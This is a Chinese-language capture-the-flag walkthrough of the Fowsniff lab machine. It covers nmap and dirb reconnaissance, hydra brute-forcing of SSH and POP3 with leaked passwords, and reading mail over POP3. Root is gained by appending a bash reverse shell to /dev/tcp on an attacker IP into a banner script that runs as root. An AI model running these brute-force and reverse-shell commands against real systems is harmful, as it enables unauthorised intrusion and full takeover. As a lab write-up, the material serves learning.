fowsniff

一、信息收集

sudo nmap --min-rate 10000 -sS -p- 192.168.1.253
sudo nmap -sT -sC -sV -p22,80,110,143 -O 192.168.1.253

去80，

先dirb

dirb http://192.168.1.253 -X ,.txt,.html,.zip,.rar,.sql

emmm，可以注意一下，也没其它路径了，去首页的账号看看，看它发了什么信息，给了个ssh的用户，但是密码呢，32位哈希值貌似破解不出来

它留言了个Tyrannosaurus Rekt不知道什么意思，好吧，俚语

B1gN1nj4尝试了下，不是，哦，这个应该是那个hacker的名字

sU –top-pores也没什么特别的端口

回到那个账户，它的关注列表就2个，其中有个账户，有密码单，使用该密码单进行爆破吧，hydra很慢，我等不到结果了，直接看wp

二、其它信息收集

啧，wp可点开账户提供的链接，但我点击已经失效了，哦，它的签名上还有链接，疏忽了

进去后，TA的意思是导出了一些密码，访问链接

有一些密码

它也说了，是邮箱密码，解密

我的crackmapexec用不了，报错了，用hydra

三、hydra尝试登录pop3

hydra -L sniff_user.txt -P sniff_pass.txt 192.168.1.253 ssh -t 4 #没有，当然了，ssh我只是尝试一下
#pop3
hydra -L sniff_user.txt -P sniff_pass.txt 192.168.1.253 pop3 -t 4

四、pop命令行登录

1.telnet方式

2.用nc

retr 1

第二封信内容，是baksteen的回信，大意可以推断，他可能忘记修改密码了，导致了隐患

From: baksteen@fowsniff

ssh baksteen@fowsniff#是的，他忘了改临时密码

#进来后
uname -a #4.4.0-116-generic
sudo -l #无
find / -perm -u=s -type f 2>/dev/null#无
#找可修改文件 # -f 普通文档
find / -writable -type f -not -path "/sys/*"  -not -path "/proc/*"  -not -path "/usr/share/*" 2>/dev/null 

五、banner脚本提权

看下第一个脚本

这个打印出来的界面就是ssh登录成功的界面，考虑一下

echo "bash -c 'bash -i >& /dev/tcp/192.168.1.109/1333 0>&1'
" >>/opt/cube/cube.sh

攻击机监听，靶机shell执行，好！~~~~额，拿到的还是baksteen的shell

应该监听，然后这边退出ssh，重新登录一下，嘶，居然拿到了root的权限

疑问

ls -la可知，文件并没有root权限，为什么可以弹回rootshell

总结

1. 利用端口为：22，80，110
2. 80端口透露被一个hacker泄露了数据
3. 根据hacker的泄露数据得到pop的邮箱凭证
4. 通过pop邮箱登录，查看文件内容，利用用户仍采用默认密码的心理，尝试ssh，登录成功
5. 提权方式无果，发现banner脚本，插入反弹shell语句，拿到root权限

其实内核提权也可以，但这个一般只是下下策

此次渗透本质是相当于借助第一位hacker的信息+用户对自己安全的不重视

学到了pop命令与banner脚本，这个类似于之前的narak靶场

dpkg - l | grep python #查看是否有python